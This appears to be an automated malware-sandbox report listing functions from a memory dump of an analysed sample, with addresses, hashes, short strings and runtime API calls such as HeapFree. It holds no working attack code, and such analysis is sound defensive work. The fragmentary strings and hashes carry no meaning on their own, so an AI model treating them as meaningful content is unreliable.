Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: ea42c45ce9a46caaa72f925a0965240ae88f8f9ca4e5ba5032710b8eb344023a
Instruction ID: abc6ef34f02e2018a3cf6738aa2b068f4f3893fbed35aa2c92f8bdfd5c6185d8
Opcode Fuzzy Hash: ea42c45ce9a46caaa72f925a0965240ae88f8f9ca4e5ba5032710b8eb344023a
Instruction Fuzzy Hash: 835156B1E11205CBEB09CF9AC4817AEBBF1FB48354F54852AC425FB241E3B6DA51CB90

Function 68C1DE8D Relevance: 1.6, Strings: 1, Instructions: 330COMMON

Download Yara Rule

Strings

~, xrefs: 68C1DEB7

Memory Dump Source

Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true

Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID:
String ID: ~
API String ID: 0-1707062198
Opcode ID: 5ad8097ea417537e8e26a4425c28b63f33e2e653fd6cb2403d581c758a2a988b
Instruction ID: f03169813be06f9941bab8abdb4670f7eeb211cc18e97df2379e8b1893dea4dc
Opcode Fuzzy Hash: 5ad8097ea417537e8e26a4425c28b63f33e2e653fd6cb2403d581c758a2a988b
Instruction Fuzzy Hash: F3B1307550D3D18BD330CF29D4983ABBBE1AFD6304F18495CC4E99B252EB39810ADB92

Function 68C1F496 Relevance: 1.6, Strings: 1, Instructions: 326COMMON

Download Yara Rule

Strings

!%, xrefs: 68C1F6A6

Memory Dump Source

Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true

Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID:
String ID: !%
API String ID: 0-2252526427
Opcode ID: 2a788cfdf38129ccc9b02290225b1bb5692e1630fce21d44a7a59086e337632e
Instruction ID: 5e9da14c6cfc064ea3efb55996847ab0c8e39ad77d903dd267713ab697b2c52b
Opcode Fuzzy Hash: 2a788cfdf38129ccc9b02290225b1bb5692e1630fce21d44a7a59086e337632e
Instruction Fuzzy Hash: A2A19A3295D3908AD3208F68E8897EBB7E1EFD5314F188A7CC8C997255EB784506C786

Function 68C1C9BE Relevance: 1.5, Strings: 1, Instructions: 270COMMON

Download Yara Rule

Strings

>>, xrefs: 68C1CD01

Memory Dump Source

Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true

Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID:
String ID: >>
API String ID: 0-1736523924
Opcode ID: 7af8eb769a22ffdd9c16f70ad9e8ac92724860ad1783acaeed051abb327547b5
Instruction ID: 8c22f3b749ba61e7df62292b1d11dc53414bbd752d2de602c20e7b06a249accc
Opcode Fuzzy Hash: 7af8eb769a22ffdd9c16f70ad9e8ac92724860ad1783acaeed051abb327547b5
Instruction Fuzzy Hash: A1D152B0A10305DFE7149F56D989FA97BB1FB01344F1A86E9C0986F366D738804ACF95

Function 68C1D252 Relevance: 1.5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

Strings

5W7Q, xrefs: 68C1D3F1

Memory Dump Source

Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true

Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID:
String ID: 5W7Q
API String ID: 0-53030636
Opcode ID: 9f2e4376d6d2164d3b310746f4e0db2411941d6abbaa44c84c5f35703fd36502
Instruction ID: 7875e09dbedbbae49762baa92c1ff87bfdc69a8d397a423ab54e798c62d1cd2c
Opcode Fuzzy Hash: 9f2e4376d6d2164d3b310746f4e0db2411941d6abbaa44c84c5f35703fd36502
Instruction Fuzzy Hash: A6815BB6E142208BC704CF19C8C166BBBB2FF95304B5A919DDD91AF359E7789802CB94

Function 68C1E5EC Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

D, xrefs: 68C1E8C5

Memory Dump Source

Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true

Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID:
String ID: D
API String ID: 0-2746444292
Opcode ID: 8fd255488a632667800d66de56ea0c4bcc8044c4de3df099d0d0fd0a960c3e48
Instruction ID: 5ca30681f5d4f43a21008ed0667e67190690f1035ca1f17963d56a8834da7a03
Opcode Fuzzy Hash: 8fd255488a632667800d66de56ea0c4bcc8044c4de3df099d0d0fd0a960c3e48
Instruction Fuzzy Hash: F4B1FEB44183909BE3208F51D49935BBBF1FF86788F509A0CE4D92B764D7BA8506CF86

Function 68C52930 Relevance: 1.4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

Strings

@, xrefs: 68C52A05

Memory Dump Source

Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true

Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 21586ac75f6ee9d420c2f888ddf1f8ad857b7154f4649b721990310c9634cdfb
Instruction ID: 2ab5166c7a4d87afc1c16c98af513bb5909111fb5764b034761a965e43ecbac7
Opcode Fuzzy Hash: 21586ac75f6ee9d420c2f888ddf1f8ad857b7154f4649b721990310c9634cdfb
Instruction Fuzzy Hash: 7C416672A082018BEB04CF24C86167B73F2FFD5318F54852CE4A59B391EB34992AC7D6

Function 68C52D70 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

5|iL, xrefs: 68C52EB0

Memory Dump Source

Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true

Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID:
String ID: 5|iL
API String ID: 0-1880071150
Opcode ID: 4a0d2ac823cf73de7bab280278e5870a3414b3ba8f484ff9ffce97148325ed08
Instruction ID: 9c38eafc572c23e8254af020ea33774051d8c2a48a1b85937b9fd4db2a124dc8
Opcode Fuzzy Hash: 4a0d2ac823cf73de7bab280278e5870a3414b3ba8f484ff9ffce97148325ed08
Instruction Fuzzy Hash: DC416A386083019FE701DF65CC50B37B3E2FB89715F50852CE69497251E7B1A971C78A

Function 68C52F00 Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

@, xrefs: 68C52F69

Memory Dump Source

Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true

Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 6f0e467e03569edbc09609ff50d5c475ee457ef8ec1b87c741a90d483101c77e
Instruction ID: 32a4da97bb89045d72e0676dca80fd1b06a79f7c8f057b57e88a958097a42786
Opcode Fuzzy Hash: 6f0e467e03569edbc09609ff50d5c475ee457ef8ec1b87c741a90d483101c77e
Instruction Fuzzy Hash: 9831FE751083008FC304DFA4D8C062BB7F5FB8A354F40892DEA948B290E7759529CB9A

Function 68C05B7C Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 68C05B7C

Memory Dump Source

Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true

Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 092a740264d4b4e42454b18365805907feea5bf8c2bdfc662fab8e321fee3dad
Instruction ID: 4626e47d502646ce9764e05892ca104d5f032bee3931c2aef9ed94fbdaeb49d1
Opcode Fuzzy Hash: 092a740264d4b4e42454b18365805907feea5bf8c2bdfc662fab8e321fee3dad
Instruction Fuzzy Hash: 06A01130A002008B8B808E32828820E3AB8AA022C2B0A00A8A000E0000EAA0C0E0AA80

Function 68C17C70 Relevance: .8, Instructions: 826COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true

Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0478513e9e3b50926b6c25ba14857a2fe4ee7476300e5b012235f8d430b5382
Instruction ID: 270b1d6fb608b8d8db27f9e81467cca7200466e07c6e3c89547f22ab0c21fdfc
Opcode Fuzzy Hash: c0478513e9e3b50926b6c25ba14857a2fe4ee7476300e5b012235f8d430b5382
Instruction Fuzzy Hash: 1042D33164C7158BC311DF28E8D0AAAB3E1FFC4315F958A2DD9E587280E738E856D742

Function 68C16CB0 Relevance: .3, Instructions: 314COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true

Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d001ee3fa9407732dc6a46a27d13c36f92bd168f46764626096062e58005f181
Instruction ID: d8d34a3ba665a1e355c9b5a05ad5ad8c730607707c188a9c9b83743728d3575e
Opcode Fuzzy Hash: d001ee3fa9407732dc6a46a27d13c36f92bd168f46764626096062e58005f181
Instruction Fuzzy Hash: 69C148B29487418FC360CF28C896BABB7F0BF85318F48492DD5E9C7242E738A155DB46

Function 68C1EBD9 Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true

Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9014fafaedb5255517029e815f517c8f6aa2d48da45b9c66504435eac8c71f5c
Instruction ID: 4789ddea1b420e2abce80e4ca2d8d8423904babf3dd1332fc7897ee15a4b38d7
Opcode Fuzzy Hash: 9014fafaedb5255517029e815f517c8f6aa2d48da45b9c66504435eac8c71f5c
Instruction Fuzzy Hash: 36818A3A7493109BD7188B28CCA162AB7E2FB85314F9E453ED4EAD7790E2718C038785

Function 68C294D0 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true

Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 264725778cb1bb67cd01e1c22dc5135cdcadfbb74274775da8d17485ef73deb4
Instruction ID: d5f197819330edcc8251b076142170af4bb0033e9036350e4ec01f96162ff24d
Opcode Fuzzy Hash: 264725778cb1bb67cd01e1c22dc5135cdcadfbb74274775da8d17485ef73deb4
Instruction Fuzzy Hash: 8A314475E19305DAD300DF2CC8A5A23B3F5EF95360F499A28F8A58B2C1FB788904C395

Function 68C36910 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true

Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b02f44bd946c1f2d02873fd7add9eb3621ba9c3810df1b3d58e1c6e076fefd1c
Instruction ID: 38acc4841717a2ae36e744ebfb1ffc82d2a33af60b303e20c330d03f98b13a03
Opcode Fuzzy Hash: b02f44bd946c1f2d02873fd7add9eb3621ba9c3810df1b3d58e1c6e076fefd1c
Instruction Fuzzy Hash: E621D33524C3519BE3048F64E89575FBBB1EBC2704F05892CE1D56B2D1C7B5990A8B86

Function 68C12C20 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true

Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c409e37377122d756683e200e61e216973451adc5ae8440ce1c9bedf68858a57
Instruction ID: 99d9781a3106a484f61149a01fc8f982dfbeca3a644b7d2a61bdc6653043eafe
Opcode Fuzzy Hash: c409e37377122d756683e200e61e216973451adc5ae8440ce1c9bedf68858a57
Instruction Fuzzy Hash: 7FF0BB7F75D6560BB314DDF998E0627F3D6E7DA244F064038EB90D3611E560E4029194

Function 68C1EB14 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true

Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcdc01861363e9c5ac544f3c56f389d5af500d18b10cee118274b4900a87bff4
Instruction ID: 7e80186f1c64bf3bffedfc886f54cefdd87f2c5fdcac882b7f8c13de1aeb176b
Opcode Fuzzy Hash: dcdc01861363e9c5ac544f3c56f389d5af500d18b10cee118274b4900a87bff4
Instruction Fuzzy Hash: A9010E3C56D24146D26CEB34C8E09BE73E46F51208FD0162CA1CB52560FF306B4DDA65

Function 68C03F69 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true

Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d52fb2acaea47cc711755e886856fc2c512988177476dc3ebe6c672e5574d84
Instruction ID: 40a9e04cd24a2587aace1d92f071d9f3518d960cfe02c2a637d27d2e8c9dae4a
Opcode Fuzzy Hash: 8d52fb2acaea47cc711755e886856fc2c512988177476dc3ebe6c672e5574d84
Instruction Fuzzy Hash: D9E08C32A11228EBCB11CB9CC904D8AF3FCEB45B84B5144A7B515E7210E272DE00D7C0

Function 68C1C703 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true

Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bac9d5e7f0551d8b6b2862464ec7429cf04cd1b6a89c4bf5841f13d2509b1f92
Instruction ID: deb99c5aec674ff5a8173177a246bc48ea6abd5ec8f88eb922bdb0f347157fc0
Opcode Fuzzy Hash: bac9d5e7f0551d8b6b2862464ec7429cf04cd1b6a89c4bf5841f13d2509b1f92
Instruction Fuzzy Hash: EDD0A7FEF8210047D708DB34EC42562AA6746DB10870CE030DA02C7786FF3DD40B8449

Function 68C14E86 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true

Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e63e306e247e8ddd34d53438d9caa76178b163fcefc3e3770fea4f7d69f650c2
Instruction ID: 09128053b4bb38be0f814a924dbffe7ba151b7557ef497de6f85f1ca1e1391c9
Opcode Fuzzy Hash: e63e306e247e8ddd34d53438d9caa76178b163fcefc3e3770fea4f7d69f650c2
Instruction Fuzzy Hash: C1A00225F482048E43509F10D681C76E2337387601F21B6219898332148325D48AD64D

Function 68C06958 Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___free_lconv_mon.LIBCMT ref: 68C0699C

Part of subcall function 68C08887: _free.LIBCMT ref: 68C088A4
Part of subcall function 68C08887: _free.LIBCMT ref: 68C088B6
Part of subcall function 68C08887: _free.LIBCMT ref: 68C088C8
Part of subcall function 68C08887: _free.LIBCMT ref: 68C088DA
Part of subcall function 68C08887: _free.LIBCMT ref: 68C088EC
Part of subcall function 68C08887: _free.LIBCMT ref: 68C088FE
Part of subcall function 68C08887: _free.LIBCMT ref: 68C08910
Part of subcall function 68C08887: _free.LIBCMT ref: 68C08922
Part of subcall function 68C08887: _free.LIBCMT ref: 68C08934
Part of subcall function 68C08887: _free.LIBCMT ref: 68C08946
Part of subcall function 68C08887: _free.LIBCMT ref: 68C08958
Part of subcall function 68C08887: _free.LIBCMT ref: 68C0896A
Part of subcall function 68C08887: _free.LIBCMT ref: 68C0897C

_free.LIBCMT ref: 68C06991

Part of subcall function 68C04273: HeapFree.KERNEL32(00000000,00000000,?,68C034AC), ref: 68C04289
Part of subcall function 68C04273: GetLastError.KERNEL32(?,?,68C034AC), ref: 68C0429B

_free.LIBCMT ref: 68C069B3
_free.LIBCMT ref: 68C069C8
_free.LIBCMT ref: 68C069D3
_free.LIBCMT ref: 68C069F5
_free.LIBCMT ref: 68C06A08
_free.LIBCMT ref: 68C06A16
_free.LIBCMT ref: 68C06A21
_free.LIBCMT ref: 68C06A59
_free.LIBCMT ref: 68C06A60
_free.LIBCMT ref: 68C06A7D
_free.LIBCMT ref: 68C06A95

Memory Dump Source

Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true

Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 18cc07e6fb2a7e21ec4b39073013fc9f57eede2678f9f74402c66276dea3882b
Instruction ID: 9c4e089ede096509a5d03ce073d904a9a51f6264c5ae1e66a28aeb72856cde60
Opcode Fuzzy Hash: 18cc07e6fb2a7e21ec4b39073013fc9f57eede2678f9f74402c66276dea3882b
Instruction Fuzzy Hash: 13314E31A04B01DFEB219E7DD844F6777E8EF00398F90842AE568D6154FB72EA91D714

Function 68C03B33 Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 68C03B49

Part of subcall function 68C04273: HeapFree.KERNEL32(00000000,00000000,?,68C034AC), ref: 68C04289
Part of subcall function 68C04273: GetLastError.KERNEL32(?,?,68C034AC), ref: 68C0429B

_free.LIBCMT ref: 68C03B55
_free.LIBCMT ref: 68C03B60
_free.LIBCMT ref: 68C03B6B
_free.LIBCMT ref: 68C03B76
_free.LIBCMT ref: 68C03B81
_free.LIBCMT ref: 68C03B8C
_free.LIBCMT ref: 68C03B97
_free.LIBCMT ref: 68C03BA2
_free.LIBCMT ref: 68C03BB0

Memory Dump Source

Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true

Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: a0839b4c5ac9cdf69949d58bf7ed97553edef6fba0b4c4f7d0b22161205533a4
Instruction ID: b3f4e8051b2bc86899d929532140332440538ad3085468b902fd495512a4c1f1
Opcode Fuzzy Hash: a0839b4c5ac9cdf69949d58bf7ed97553edef6fba0b4c4f7d0b22161205533a4
Instruction Fuzzy Hash: 1E219B7AD04108EFCF51DFA8C840DEE7BB5BF18284F404165A9159B125EB72DB44DB84

Function 68C45700 Relevance: 13.9, Strings: 11, Instructions: 129COMMON

Download Yara Rule

Strings

C, xrefs: 68C457C3
T, xrefs: 68C457DC
_, xrefs: 68C457D2
M, xrefs: 68C457D7
F, xrefs: 68C457E6
E, xrefs: 68C457B9
^, xrefs: 68C457C8
[, xrefs: 68C457BE
x, xrefs: 68C457F0
C, xrefs: 68C457EB
J, xrefs: 68C457CD

Memory Dump Source

Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true

Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID:
String ID: C$C$E$F$J$M$T$[$^$_$x
API String ID: 0-1009912999
Opcode ID: bb28aaa3528739d5f0807518c9aed68cc9302566c67dc8b84305165392623b74
Instruction ID: a0dba346576d774b4c802658327738a210f6c665e533122f89a807ea28bd6cad
Opcode Fuzzy Hash: bb28aaa3528739d5f0807518c9aed68cc9302566c67dc8b84305165392623b74
Instruction Fuzzy Hash: 1A4161B154C7818FD300AF78D88835FBFE0AB92214F48493DE5D587382E679858AC797

Function 68C02110 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 68C02147
___except_validate_context_record.LIBVCRUNTIME ref: 68C0214F
_ValidateLocalCookies.LIBCMT ref: 68C021D8
__IsNonwritableInCurrentImage.LIBCMT ref: 68C02203
_ValidateLocalCookies.LIBCMT ref: 68C02258

Strings

csm, xrefs: 68C021ED

Memory Dump Source

Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true

Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: e776a42d4add9f75ca43a627dc7d3932047b6bf6a9cfd8e6800f25ecc199203c
Instruction ID: 77f7a6cb61cc0c674c8a84316f88ba85db1b714d08f5af3bf2a9a311bc11a154
Opcode Fuzzy Hash: e776a42d4add9f75ca43a627dc7d3932047b6bf6a9cfd8e6800f25ecc199203c
Instruction Fuzzy Hash: C94199349002089FCF06CF5CCC64A9EBBB5AF493A8F908155E9246B391E773DA56CB91

Function 68C0579A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 68C057F1
ext-ms-, xrefs: 68C05805

Memory Dump Source

Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true

Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: ae9df7b812eb65ec01da5ff557c998bce975fb65d82c9ad6f88257885c9d9404
Instruction ID: 8b8a918a42edc186faf2beac05d7677597c5b6e35152eead6bbd9154ab69a686
Opcode Fuzzy Hash: ae9df7b812eb65ec01da5ff557c998bce975fb65d82c9ad6f88257885c9d9404
Instruction Fuzzy Hash: C221EB31A85215EBDB118A6D8C44B1E3B78AF027E4F610725ED35BB691F633D901D5E0

Function 68C08A26 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 68C089EE: _free.LIBCMT ref: 68C08A13

_free.LIBCMT ref: 68C08A74

Part of subcall function 68C04273: HeapFree.KERNEL32(00000000,00000000,?,68C034AC), ref: 68C04289
Part of subcall function 68C04273: GetLastError.KERNEL32(?,?,68C034AC), ref: 68C0429B

_free.LIBCMT ref: 68C08A7F
_free.LIBCMT ref: 68C08A8A
_free.LIBCMT ref: 68C08ADE
_free.LIBCMT ref: 68C08AE9
_free.LIBCMT ref: 68C08AF4
_free.LIBCMT ref: 68C08AFF

Memory Dump Source

Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true

Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

